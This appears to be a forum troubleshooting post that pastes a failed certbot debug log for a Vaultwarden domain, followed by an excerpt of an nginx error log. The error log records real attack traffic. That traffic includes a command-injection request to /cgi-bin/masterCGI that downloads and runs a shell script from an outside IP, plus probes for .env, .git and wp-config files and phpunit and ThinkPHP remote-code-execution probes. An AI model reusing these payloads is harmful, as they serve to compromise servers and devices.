new_authzr_uri=None, terms_of_service=None), ff47a0a8b3b4440b514c9676077dc033, Meta(creation_dt=datetime.datetime(2021, 10, 18, 21, 30, 9, tzinfo=<UTC>), creation_host='610dfc3962ef', register_to_eff=None))> 2022-12-04 06:38:38,214:DEBUG:acme.client:Sending GET request to https://acme-v02.api.letsencrypt.org/directory. 2022-12-04 06:38:38,219:DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): acme-v02.api.letsencrypt.org:443 2022-12-04 06:38:38,381:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "GET /directory HTTP/1.1" 200 659 2022-12-04 06:38:38,383:DEBUG:acme.client:Received response: HTTP 200 Server: nginx Date: Sun, 04 Dec 2022 12:38:38 GMT Content-Type: application/json Content-Length: 659 Connection: keep-alive Cache-Control: public, max-age=0, no-cache X-Frame-Options: DENY Strict-Transport-Security: max-age=604800 { "WevIWKAr5WU": "https://community.letsencrypt.org/t/adding-random-entries-to-the-directory/33417", "keyChange": "https://acme-v02.api.letsencrypt.org/acme/key-change", "meta": { "caaIdentities": [ "letsencrypt.org" ], "termsOfService": "https://letsencrypt.org/documents/LE-SA-v1.3-September-21-2022.pdf", "website": "https://letsencrypt.org" }, "newAccount": "https://acme-v02.api.letsencrypt.org/acme/new-acct", "newNonce": "https://acme-v02.api.letsencrypt.org/acme/new-nonce", "newOrder": "https://acme-v02.api.letsencrypt.org/acme/new-order", "revokeCert": "https://acme-v02.api.letsencrypt.org/acme/revoke-cert" } 2022-12-04 06:38:38,385:DEBUG:certbot._internal.display.obj:Notifying user: Requesting a certificate for vaultwarden.XXXXX.com 2022-12-04 06:38:38,397:DEBUG:certbot.crypto_util:Generating ECDSA key (2048 bits): /etc/letsencrypt/keys/0004_key-certbot.pem 2022-12-04 06:38:38,410:DEBUG:certbot.crypto_util:Creating CSR: /etc/letsencrypt/csr/0004_csr-certbot.pem 2022-12-04 06:38:38,415:DEBUG:acme.client:Requesting fresh nonce 2022-12-04 06:38:38,415:DEBUG:acme.client:Sending HEAD request to https://acme-v02.api.letsencrypt.org/acme/new-nonce. 2022-12-04 06:38:38,468:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "HEAD /acme/new-nonce HTTP/1.1" 200 0 2022-12-04 06:38:38,470:DEBUG:acme.client:Received response: HTTP 200 Server: nginx Date: Sun, 04 Dec 2022 12:38:38 GMT Connection: keep-alive Cache-Control: public, max-age=0, no-cache Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index" Replay-Nonce: 5CA2zA_muTGdjlNqLW3tXuuce14PoKWDX_7cT8XZ6FKy514 X-Frame-Options: DENY Strict-Transport-Security: max-age=604800 2022-12-04 06:38:38,470:DEBUG:acme.client:Storing nonce: 5CA2zA_muTGdjlNqLW3tXuuce14PoKWDX_7cT8XZ6FKy514 2022-12-04 06:38:38,471:DEBUG:acme.client:JWS payload: b'{\n "identifiers": [\n {\n "type": "dns",\n "value": "vaultwarden.XXXXX.com"\n }\n ]\n}' 2022-12-04 06:38:38,480:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-order: { "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjQ0Njg0NDMwIiwgIm5vbmNlIjogIjVDQTJ6QV9tdVRHZGpsTnFMVzN0WHV1Y2UxNFBvS1dEWF83Y1Q4WFo2Rkt5NTE0IiwgInVybCI6ICJodHRwczovL2FjbWUtdjAyLmFwaS5sZXRzZW5jcnlwdC5vcmcvYWNtZS9uZXctb3JkZXIifQ", "signature": "AGiv5F7QRfo6PF87gLcBOjzJV0vHekURy8FxVwC9II3t6DXahB_h8N8zZzucHqqI8s28MFqaCKG0UhXl5MsYScYdf2Ecei0KQYUvBUYntL7HE840nYRKlLtYOQ2Q6D6ZzFuwWLcOmBJ47oziDfZZ_GiXrbgFoTw9GWD-jndBKh5cM1Svd2SYFIH3cQkg-YElcLmDbdHxRLzxt7M2_3nH5Eco9XtAT2-gr-pJVt7T5JnFPYDuc9vp3zesj8Oq2ylLJHHUrhnzedVZiyEf5HKWf5W8L9MduAHjKTX3SGCSAtUPPHaJ-qqLpXwY3R8jSDoP_-iZEr9A0eGqew32FLBA7Q", "payload": "ewogICJpZGVudGlmaWVycyI6IFsKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogInZhdWx0d2FyZGVuLmpzYnNlcnZlci5jb20iCiAgICB9CiAgXQp9" } 2022-12-04 06:38:38,679:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-order HTTP/1.1" 201 350 2022-12-04 06:38:38,681:DEBUG:acme.client:Received response: HTTP 201 Server: nginx Date: Sun, 04 Dec 2022 12:38:38 GMT Content-Type: application/json Content-Length: 350 Connection: keep-alive Boulder-Requester: 244684430 Cache-Control: public, max-age=0, no-cache Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index" Location: https://acme-v02.api.letsencrypt.org/acme/order/244684430/150257178297 Replay-Nonce: 371Cq1DKlCrmoBqtyvsiKOklNyU3_ZfKvRRlQmn0CK72WQ8 X-Frame-Options: DENY Strict-Transport-Security: max-age=604800 { "status": "pending", "expires": "2022-12-11T12:38:38Z", "identifiers": [ { "type": "dns", "value": "vaultwarden.XXXXX.com" } ], "authorizations": [ "https://acme-v02.api.letsencrypt.org/acme/authz-v3/183831876757" ], "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/244684430/150257178297" } 2022-12-04 06:38:38,681:DEBUG:acme.client:Storing nonce: 371Cq1DKlCrmoBqtyvsiKOklNyU3_ZfKvRRlQmn0CK72WQ8 2022-12-04 06:38:38,682:DEBUG:acme.client:JWS payload: b'' 2022-12-04 06:38:38,688:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz-v3/183831876757: { "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjQ0Njg0NDMwIiwgIm5vbmNlIjogIjM3MUNxMURLbENybW9CcXR5dnNpS09rbE55VTNfWmZLdlJSbFFtbjBDSzcyV1E4IiwgInVybCI6ICJodHRwczovL2FjbWUtdjAyLmFwaS5sZXRzZW5jcnlwdC5vcmcvYWNtZS9hdXRoei12My8xODM4MzE4NzY3NTcifQ", "signature": "MJg0fdiotGsLGY0OtDLLHrsgaDinsOYK37uXLhV9uoComDYu1z3VY4l84Uu75m5-CR-RB1hGrDSoX2K1yqqfHino783SMINzRfTfoxyFhLkrvG4j3vX6FZB7NfpiGv7bxbLnWDHO9XHcJ7pdwHz4Uf_HMa-KsBwlwGn8oqNoEamO1dwqfedmEFO4yNj4f-yvGyL7PjwBLeujeuG0bx6JQqfdSbq3pfnEOgkQGlvPd-PZ2nL1HHdg4DdjZIx_gxIIke0zs8gMTnjP2tizO6nBbpHMLMvipGEgCYxnPy1hTOVpK-GYHpoUzoc4bT7PEvyqhrvIsBAgCSTmYL6S-96X7Q", "payload": "" } 2022-12-04 06:38:38,764:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz-v3/183831876757 HTTP/1.1" 200 809 2022-12-04 06:38:38,765:DEBUG:acme.client:Received response: HTTP 200 Server: nginx Date: Sun, 04 Dec 2022 12:38:38 GMT Content-Type: application/json Content-Length: 809 Connection: keep-alive Boulder-Requester: 244684430 Cache-Control: public, max-age=0, no-cache Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index" Replay-Nonce: 1DFA1Zkxib13g0N_a87Ib88r_FTzhGEJKWuXsp6aN6otrlY X-Frame-Options: DENY Strict-Transport-Security: max-age=604800 { "identifier": { "type": "dns", "value": "vaultwarden.XXXXX.com" }, "status": "pending", "expires": "2022-12-11T12:38:38Z", "challenges": [ { "type": "http-01", "status": "pending", "url": "https://acme-v02.api.letsencrypt.org/acme/chall-v3/183831876757/f0OwpA", "token": "5lz_b5iRNiFt7mWfO88xUuR7J4E7zurpem2-d2IZGH4" }, { "type": "dns-01", "status": "pending", "url": "https://acme-v02.api.letsencrypt.org/acme/chall-v3/183831876757/auEevQ", "token": "5lz_b5iRNiFt7mWfO88xUuR7J4E7zurpem2-d2IZGH4" }, { "type": "tls-alpn-01", "status": "pending", "url": "https://acme-v02.api.letsencrypt.org/acme/chall-v3/183831876757/5OAA5Q", "token": "5lz_b5iRNiFt7mWfO88xUuR7J4E7zurpem2-d2IZGH4" } ] } 2022-12-04 06:38:38,766:DEBUG:acme.client:Storing nonce: 1DFA1Zkxib13g0N_a87Ib88r_FTzhGEJKWuXsp6aN6otrlY 2022-12-04 06:38:38,767:INFO:certbot._internal.auth_handler:Performing the following challenges: 2022-12-04 06:38:38,768:INFO:certbot._internal.auth_handler:http-01 challenge for vaultwarden.jsbserver.com 2022-12-04 06:38:38,769:INFO:certbot._internal.plugins.webroot:Using the webroot path /data/letsencrypt-acme-challenge for all unmatched domains. 2022-12-04 06:38:38,769:DEBUG:certbot._internal.plugins.webroot:Creating root challenges validation dir at /data/letsencrypt-acme-challenge/.well-known/acme-challenge 2022-12-04 06:38:38,774:DEBUG:certbot._internal.plugins.webroot:Attempting to save validation to /data/letsencrypt-acme-challenge/.well-known/acme-challenge/5lz_b5iRNiFt7mWfO88xUuR7J4E7zurpem2-d2IZGH4 2022-12-04 06:38:38,776:DEBUG:acme.client:JWS payload: b'{}' 2022-12-04 06:38:38,781:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/chall-v3/183831876757/f0OwpA: { "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjQ0Njg0NDMwIiwgIm5vbmNlIjogIjFERkExWmt4aWIxM2cwTl9hODdJYjg4cl9GVHpoR0VKS1d1WHNwNmFONm90cmxZIiwgInVybCI6ICJodHRwczovL2FjbWUtdjAyLmFwaS5sZXRzZW5jcnlwdC5vcmcvYWNtZS9jaGFsbC12My8xODM4MzE4NzY3NTcvZjBPd3BBIn0", "signature": "lIt_Tsfsj4ANGfGjTl9iCK41f0grLPz_3oC1EKbXY1oC3wgBcWmW0I2WhCHgQjxNK8obQMK6o2-RDc-1bDp41j1f_PiGVnVqf4oCEOIgv83NjDlMuXMUvhAKxi5Ek-M-rpQb5nI92Sd9j5_DMJ5SunzCsns_ln-5RRm5bPfRla6ailt023OcDA-_k7JqhdmLwZKN9mzFDlZZG99wDpoN9q8R9PyCWOtYYRl3ucM0h_8KzM8VTKt5wtVtmtdiuc7lYJAxmgAwtiT4Z4_0Evu5lfRddtrM098--VbfvbDFfafNC5VSbGdVG94KE_EXYfJnBycDJ96t26LenNMgJvDhzQ", "payload": "e30" } 2022-12-04 06:38:38,838:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/chall-v3/183831876757/f0OwpA HTTP/1.1" 200 187 2022-12-04 06:38:38,839:DEBUG:acme.client:Received response: HTTP 200 Server: nginx Date: Sun, 04 Dec 2022 12:38:38 GMT Content-Type: application/json Content-Length: 187 Connection: keep-alive Boulder-Requester: 244684430 Cache-Control: public, max-age=0, no-cache Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index", <https://acme-v02.api.letsencrypt.org/acme/authz-v3/183831876757>;rel="up" Location: https://acme-v02.api.letsencrypt.org/acme/chall-v3/183831876757/f0OwpA Replay-Nonce: 1DFAY52gw7ubiatPtDC8A01gOji0v4OZdZWxVoLreItsCjA X-Frame-Options: DENY Strict-Transport-Security: max-age=604800 { "type": "http-01", "status": "pending", "url": "https://acme-v02.api.letsencrypt.org/acme/chall-v3/183831876757/f0OwpA", "token": "5lz_b5iRNiFt7mWfO88xUuR7J4E7zurpem2-d2IZGH4" } 2022-12-04 06:38:38,840:DEBUG:acme.client:Storing nonce: 1DFAY52gw7ubiatPtDC8A01gOji0v4OZdZWxVoLreItsCjA 2022-12-04 06:38:38,841:INFO:certbot._internal.auth_handler:Waiting for verification... 2022-12-04 06:38:39,842:DEBUG:acme.client:JWS payload: b'' 2022-12-04 06:38:39,848:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz-v3/183831876757: { "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjQ0Njg0NDMwIiwgIm5vbmNlIjogIjFERkFZNTJndzd1YmlhdFB0REM4QTAxZ09qaTB2NE9aZFpXeFZvTHJlSXRzQ2pBIiwgInVybCI6ICJodHRwczovL2FjbWUtdjAyLmFwaS5sZXRzZW5jcnlwdC5vcmcvYWNtZS9hdXRoei12My8xODM4MzE4NzY3NTcifQ", "signature": "Hm3jP0ZqcRvG2EE4dXqX54OOyvN6igKFK8pIyObuElcdijyfYbS0Tc81ekXc34JepaVZyyMukt47QYdOoFv3p4kACFdYFDuJVIJ4mh16XNVYFPub7zo9du7PHoB2hJ_y_CMhdqKbdYX5NrYyAsxxVn4_e0srN1aCOFNj59F0yOLPWJYF9w3F7sAUAPWU21agnUVdHNAMhAOe50xwxUd_W3V7HJDJDXuvQlqFqEd7nqJCXDp0GsuLndXONc3Imbv4j8_E7vAqaz0ExhScWtPSA9dpHu9Px5z7Nu0aw80coReZs9nAYvyQDTQUajlHfRzgd3XT2rL5uxXCAUid-I59_Q", "payload": "" } 2022-12-04 06:38:39,922:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz-v3/183831876757 HTTP/1.1" 200 1130 2022-12-04 06:38:39,924:DEBUG:acme.client:Received response: HTTP 200 Server: nginx Date: Sun, 04 Dec 2022 12:38:39 GMT Content-Type: application/json Content-Length: 1130 Connection: keep-alive Boulder-Requester: 244684430 Cache-Control: public, max-age=0, no-cache Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index" Replay-Nonce: 371CIPOmXjwa3h2D0ehLiA3F4Wdycs-bA9Nnz93C87hWxrI X-Frame-Options: DENY Strict-Transport-Security: max-age=604800 { "identifier": { "type": "dns", "value": "vaultwarden.XXXXX.com" }, "status": "invalid", "expires": "2022-12-11T12:38:38Z", "challenges": [ { "type": "http-01", "status": "invalid", "error": { "type": "urn:ietf:params:acme:error:unauthorized", "detail": "2a00:1450:400e:80f::2013: Invalid response from http://vaultwarden.XXXXX.com/.well-known/acme-challenge/5lz_b5iRNiFt7mWfO88xUuR7J4E7zurpem2-d2IZGH4: 404", "status": 403 }, "url": "https://acme-v02.api.letsencrypt.org/acme/chall-v3/183831876757/f0OwpA", "token": "5lz_b5iRNiFt7mWfO88xUuR7J4E7zurpem2-d2IZGH4", "validationRecord": [ { "url": "http://vaultwarden.XXXXX.com/.well-known/acme-challenge/5lz_b5iRNiFt7mWfO88xUuR7J4E7zurpem2-d2IZGH4", "hostname": "vaultwarden.XXXXX.com", "port": "80", "addressesResolved": [ "142.250.72.51", "2a00:1450:400e:80f::2013" ], "addressUsed": "2a00:1450:400e:80f::2013" } ], "validated": "2022-12-04T12:38:38Z" } ] } 2022-12-04 06:38:39,924:DEBUG:acme.client:Storing nonce: 371CIPOmXjwa3h2D0ehLiA3F4Wdycs-bA9Nnz93C87hWxrI 2022-12-04 06:38:39,925:INFO:certbot._internal.auth_handler:Challenge failed for domain vaultwarden.XXXXX.com 2022-12-04 06:38:39,926:INFO:certbot._internal.auth_handler:http-01 challenge for vaultwarden.XXXXX.com 2022-12-04 06:38:39,927:DEBUG:certbot._internal.display.obj:Notifying user: Certbot failed to authenticate some domains (authenticator: webroot). The Certificate Authority reported these problems: Domain: vaultwarden.XXXXX.com Type: unauthorized Detail: 2a00:1450:400e:80f::2013: Invalid response from http://vaultwarden.XXXXX.com/.well-known/acme-challenge/5lz_b5iRNiFt7mWfO88xUuR7J4E7zurpem2-d2IZGH4: 404 Hint: The Certificate Authority failed to download the temporary challenge files created by Certbot. Ensure that the listed domains serve their content from the provided --webroot-path/-w and that files created there can be downloaded from the internet. 2022-12-04 06:38:39,928:DEBUG:certbot._internal.error_handler:Encountered exception: Traceback (most recent call last): File "/usr/lib/python3.9/site-packages/certbot/_internal/auth_handler.py", line 106, in handle_authorizations self._poll_authorizations(authzrs, max_retries, best_effort) File "/usr/lib/python3.9/site-packages/certbot/_internal/auth_handler.py", line 206, in _poll_authorizations raise errors.AuthorizationError('Some challenges have failed.') certbot.errors.AuthorizationError: Some challenges have failed. 2022-12-04 06:38:39,928:DEBUG:certbot._internal.error_handler:Calling registered functions 2022-12-04 06:38:39,929:INFO:certbot._internal.auth_handler:Cleaning up challenges 2022-12-04 06:38:39,929:DEBUG:certbot._internal.plugins.webroot:Removing /data/letsencrypt-acme-challenge/.well-known/acme-challenge/5lz_b5iRNiFt7mWfO88xUuR7J4E7zurpem2-d2IZGH4 2022-12-04 06:38:39,931:DEBUG:certbot._internal.plugins.webroot:All challenges cleaned up 2022-12-04 06:38:39,932:DEBUG:certbot._internal.log:Exiting abnormally: Traceback (most recent call last): File "/usr/bin/certbot", line 8, in <module> sys.exit(main()) File "/usr/lib/python3.9/site-packages/certbot/main.py", line 19, in main return internal_main.main(cli_args) File "/usr/lib/python3.9/site-packages/certbot/_internal/main.py", line 1744, in main return config.func(config, plugins) File "/usr/lib/python3.9/site-packages/certbot/_internal/main.py", line 1591, in certonly lineage = _get_and_save_cert(le_client, config, domains, certname, lineage) File "/usr/lib/python3.9/site-packages/certbot/_internal/main.py", line 141, in _get_and_save_cert lineage = le_client.obtain_and_enroll_certificate(domains, certname) File "/usr/lib/python3.9/site-packages/certbot/_internal/client.py", line 513, in obtain_and_enroll_certificate cert, chain, key, _ = self.obtain_certificate(domains) File "/usr/lib/python3.9/site-packages/certbot/_internal/client.py", line 441, in obtain_certificate orderr = self._get_order_and_authorizations(csr.data, self.config.allow_subset_of_names) File "/usr/lib/python3.9/site-packages/certbot/_internal/client.py", line 493, in _get_order_and_authorizations authzr = self.auth_handler.handle_authorizations(orderr, self.config, best_effort) File "/usr/lib/python3.9/site-packages/certbot/_internal/auth_handler.py", line 106, in handle_authorizations self._poll_authorizations(authzrs, max_retries, best_effort) File "/usr/lib/python3.9/site-packages/certbot/_internal/auth_handler.py", line 206, in _poll_authorizations raise errors.AuthorizationError('Some challenges have failed.') certbot.errors.AuthorizationError: Some challenges have failed. 2022-12-04 06:38:39,935:ERROR:certbot._internal.log:Some challenges have failed. This is from the letsencrypt folder in nginx after I deleted the host from NPM as well as google domain and added them both again
  9. OK what I'm getting in my nginx error log is this. I edited it down to the last 2 pages 022/12/02 09:48:27 [warn] 6827#6827: 1024 worker_connections are not enough, reusing connections 2022/12/02 09:48:28 [warn] 6827#6827: 1024 worker_connections are not enough, reusing connections 2022/12/02 09:48:31 [warn] 6827#6827: 1024 worker_connections are not enough, reusing connections 2022/12/02 09:48:33 [warn] 6827#6827: 1024 worker_connections are not enough, reusing connections 2022/12/02 09:48:36 [warn] 6827#6827: 1024 worker_connections are not enough, reusing connections 2022/12/02 09:48:38 [warn] 6827#6827: 1024 worker_connections are not enough, reusing connections 2022/12/02 09:55:04 [error] 6827#6827: *62330 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 141.255.166.2, server: localhost-nginx-proxy-manager, request: "POST /boaform/admin/formLogin HTTP/1.1", host: "X.X.X.X:80", referrer: "http://X.X.X.X:80/admin/login.asp" 2022/12/02 09:55:49 [error] 6827#6827: *62331 open() "/var/www/html/bc61121a8191137a1f6357ea09cea3d3.html" failed (2: No such file or directory), client: 179.43.187.234, server: localhost-nginx-proxy-manager, request: "GET http://proxy.korsangazi.com:80/bc61121a8191137a1f6357ea09cea3d3.html HTTP/1.1", host: "proxy.korsangazi.com:80" 2022/12/02 10:50:47 [alert] 6827#6827: 1024 worker_connections are not enough 2022/12/02 10:50:47 [error] 6828#6828: *65055 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:8080/favicon.ico", host: "X.X.X.X" 2022/12/02 11:00:02 [error] 6827#6827: *65066 open() "/var/www/html/cgi-bin/masterCGI" failed (2: No such file or directory), client: 85.31.44.178, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/masterCGI?ping=nomip&user=;cd${IFS}/tmp;wget${IFS}http://185.132.53.105/f/strs.sh${IFS}-O-${IFS}>sfs;chmod${IFS}777${IFS}sfs;sh${IFS}sfs${IFS}Alcatel; HTTP/1.1", host: "X.X.X.X:80" 2022/12/02 12:38:00 [error] 6827#6827: *65081 open() "/var/www/html/.env" failed (2: No such file or directory), client: 109.237.97.180, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "X.X.X.X" 2022/12/02 13:05:34 [error] 6866#6866: *65093 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 141.255.166.2, server: localhost-nginx-proxy-manager, request: "POST /boaform/admin/formLogin HTTP/1.1", host: "X.X.X.X:80", referrer: "http://X.X.X.X:80/admin/login.asp" 2022/12/02 13:08:59 [error] 6866#6866: *65096 open() "/var/www/html/cgi-bin/masterCGI" failed (2: No such file or directory), client: 85.31.44.156, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/masterCGI?ping=nomip&user=;cd${IFS}/tmp;wget${IFS}http://185.132.53.105/f/strs.sh${IFS}-O-${IFS}>sfs;chmod${IFS}777${IFS}sfs;sh${IFS}sfs${IFS}Alcatel; HTTP/1.1", host: "X.X.X.X:80" 2022/12/02 13:25:17 [error] 6866#6866: *65103 open() "/var/www/html/wp-config.php.save" failed (2: No such file or directory), client: 191.96.227.187, server: localhost-nginx-proxy-manager, request: "GET /wp-config.php.save HTTP/1.1", host: "X.X.X.X" 2022/12/02 15:12:56 [error] 6866#6866: *65131 open() "/var/www/html/.env" failed (2: No such file or directory), client: 4.14.70.9, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "X.X.X.X" 2022/12/02 16:22:28 [error] 6866#6866: *65147 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 141.255.166.2, server: localhost-nginx-proxy-manager, request: "POST /boaform/admin/formLogin HTTP/1.1", host: "X.X.X.X:80", referrer: "http://X.X.X.X:80/admin/login.asp" 2022/12/02 17:57:02 [alert] 6866#6866: 1024 worker_connections are not enough 2022/12/02 17:57:02 [error] 6867#6867: *67073 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:8080/favicon.ico", host: "X.X.X.X" 2022/12/02 18:38:41 [alert] 6866#6866: 1024 worker_connections are not enough 2022/12/02 18:38:41 [error] 6867#6867: *68953 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:8080/favicon.ico", host: "X.X.X.X" 2022/12/02 18:38:46 [error] 6866#6866: *68955 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 183.136.225.32, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "X.X.X.X:80" 2022/12/02 20:11:55 [error] 6905#6905: *68980 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 141.255.166.2, server: localhost-nginx-proxy-manager, request: "POST /boaform/admin/formLogin HTTP/1.1", host: "X.X.X.X:80", referrer: "http://X.X.X.X:80/admin/login.asp" 2022/12/02 21:28:37 [error] 6905#6905: *68988 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 152.89.196.211, server: localhost-nginx-proxy-manager, request: "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "X.X.X.X:80" 2022/12/02 21:46:33 [error] 6905#6905: *68990 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 152.89.196.211, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "X.X.X.X:80" 2022/12/02 22:33:00 [error] 6905#6905: *68994 open() "/var/www/html/solr/admin/info/system" failed (2: No such file or directory), client: 152.89.196.211, server: localhost-nginx-proxy-manager, request: "GET /solr/admin/info/system?wt=json HTTP/1.1", host: "X.X.X.X:80" 2022/12/02 23:17:57 [error] 6905#6905: *69002 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 152.89.196.211, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1", host: "X.X.X.X:80" 2022/12/02 23:25:11 [alert] 6905#6905: 1024 worker_connections are not enough 2022/12/02 23:25:11 [error] 6906#6906: *70781 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:8080/favicon.ico", host: "X.X.X.X.108" 2022/12/02 23:25:15 [error] 6905#6905: *70783 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 183.136.225.32, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "X.X.X.X:80" 2022/12/02 23:36:31 [error] 6905#6905: *70787 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 141.255.166.2, server: localhost-nginx-proxy-manager, request: "POST /boaform/admin/formLogin HTTP/1.1", host: "X.X.X.X:80", referrer: "http://X.X.X.X:80/admin/login.asp" 2022/12/03 00:00:05 [error] 6907#6907: *70820 open() "/var/www/html/Portal0000.htm" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /Portal0000.htm HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:05 [error] 6905#6905: *70816 open() "/var/www/html/sdk" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "POST /sdk HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:05 [error] 6905#6905: *70809 open() "/var/www/html/scripts/WPnBr.dll" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "POST /scripts/WPnBr.dll HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:05 [error] 6905#6905: *70814 open() "/var/www/html/nmaplowercheck1670047205" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /nmaplowercheck1670047205 HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:06 [error] 6905#6905: *70828 open() "/var/www/html/__Additional" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /__Additional HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:06 [error] 6905#6905: *70830 open() "/var/www/html/HNAP1" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /HNAP1 HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:06 [error] 6905#6905: *71040 open() "/var/www/html/pools/default/buckets" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /pools/default/buckets HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:06 [warn] 6905#6905: 1024 worker_connections are not enough, reusing connections 2022/12/03 00:00:06 [alert] 6905#6905: *72720 1024 worker_connections are not enough while connecting to upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:8080/favicon.ico", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:06 [error] 6907#6907: *72725 open() "/var/www/html/pools" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /pools HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:06 [error] 6907#6907: *72723 open() "/var/www/html/index.jsa" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /index.jsa HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:06 [error] 6906#6906: *72730 open() "/var/www/html/.git/HEAD" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /.git/HEAD HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:06 [error] 6905#6905: *72732 open() "/var/www/html/Portal/Portal.mwsl" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /Portal/Portal.mwsl HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:06 [error] 6906#6906: *72737 open() "/var/www/html/inicio.jsp" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /inicio.jsp HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:06 [error] 6905#6905: *72740 "/var/www/html/docs/cplugError.html/index.html" is not found (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /docs/cplugError.html/ HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:06 [error] 6906#6906: *72743 open() 